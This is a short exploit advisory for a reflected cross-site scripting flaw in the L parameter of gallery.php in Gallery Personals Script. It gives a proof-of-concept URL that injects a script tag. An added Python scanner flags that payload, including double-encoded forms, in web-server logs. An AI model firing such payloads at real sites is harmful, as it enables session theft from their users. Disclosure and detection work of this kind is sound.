Channel: BOT24

Gallery Personals Script Remote XSS Vulnerability


# Exploit Title: Gallery Personals Script Remote XSS Vulnerability
# Date: 26/02/2013
# Author: The Black Devils
# Software Link: http://scriptsgenie.com/
# Demo : http://resalemembership.com/demos/pgallery/
# Category : [ webapps ]
# Dork : [ n / a ]
# Type : php
# Tested on: [Windows]


Tested on: Microsoft Windows Sp2
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a
                 
This vulnerability was discovered and researched by The Black Devils
 
 
[~] XSS Injection on Demo Site (/gallery.php?L=)
 
>>> http://server/pgallery/gallery.php?L='"><script>alert(1337);</script>'

-----------
Contact:
# Youtube  : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email    : mr.k4rizma@gmail.com
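
A defender's view of the request above, added here as an example that is not part of the original advisory: a small Python scanner that flags web-server log entries where the `L` parameter of `gallery.php` carries HTML metacharacters, including percent-encoded and double-encoded forms. The log lines, IP addresses and function names are constructed for illustration; the log format is assumed to be Apache combined style.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
HTML_META = re.compile(r"[<>\"']")  # characters that can close an attribute or open a tag

# Constructed access-log lines (combined-log style), not taken from the advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Feb/2013:10:00:00 +0000] "GET /pgallery/gallery.php?L=A HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Feb/2013:10:01:00 +0000] "GET /pgallery/gallery.php?L=%27%22%3E%3Cscript%3Ealert(1337);%3C/script%3E%27 HTTP/1.1" 200 5301',
    '203.0.113.9 - - [26/Feb/2013:10:02:00 +0000] "GET /pgallery/gallery.php?page=2&L=%253Cb%253E HTTP/1.1" 200 5188',
    '203.0.113.7 - - [26/Feb/2013:10:03:00 +0000] "GET /pgallery/index.php?L=%3Cb%3E HTTP/1.1" 200 901',
]

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    value = value.replace("+", " ")
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_l_values(log_line):
    """Decoded L= values sent to gallery.php that contain HTML metacharacters."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    path, _, query = match.group(1).partition("?")
    if not path.lower().endswith("/gallery.php"):
        return []
    hits = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        if name == "L":
            decoded = decode_fully(raw)
            if HTML_META.search(decoded):
                hits.append(decoded)
    return hits

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    return [(n, v) for n, line in enumerate(lines, 1) for v in suspicious_l_values(line)]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: L={value!r}")
```

A hit only shows that markup was sent in `L`; whether it was reflected unescaped still has to be confirmed against the response or the script's output handling.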





//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.
